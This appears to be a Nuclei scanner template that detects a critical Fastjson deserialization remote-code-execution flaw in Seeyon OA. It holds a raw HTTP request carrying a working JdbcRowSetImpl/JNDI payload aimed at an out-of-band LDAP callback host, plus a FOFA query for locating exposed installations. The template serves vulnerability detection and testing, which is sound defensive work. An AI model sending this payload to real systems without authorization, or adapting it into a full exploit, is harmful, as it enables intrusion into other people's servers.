nuclei-templates/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml

38 lines
1.3 KiB
YAML
Executable File

id: seeyon-oa-fastjson-rce
info:
name: Seeyon OA Fastjson Remote Code Execution
author: SleepingBag945
severity: critical
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go
metadata:
verified: true
max-request: 1
fofa-query: app="致远互联-OA"
tags: seeyon,oa,rce,fastjson,oast
http:
- raw:
- |
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "com.alibaba.fastjson.JSONException"
# digest: 490a00463044022040a28ff76d1a65559c1550d88f2d52b38544c702481642abced5ab4a29b640890220233c3867fd6e6f15f35555abff683c75e5a68c62ba69c83545efa86eb35b7d38:922c64590222798bb761d5b6d8e72950